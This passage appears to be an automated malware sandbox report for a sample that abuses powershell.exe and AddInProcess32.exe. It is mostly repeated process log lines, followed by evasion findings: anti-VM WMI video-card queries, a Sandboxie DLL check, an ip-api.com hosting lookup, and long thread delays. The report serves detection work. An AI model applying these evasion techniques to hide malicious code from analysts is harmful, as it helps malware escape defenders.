Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: AddInProcess32.exe PID: 8168, type: MEMORYSTR

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000358D000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 1650000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2FE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 4FE0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599465	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599355	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599249	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598810	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598699	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598374	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598149	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598039	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597812	Jump to behavior
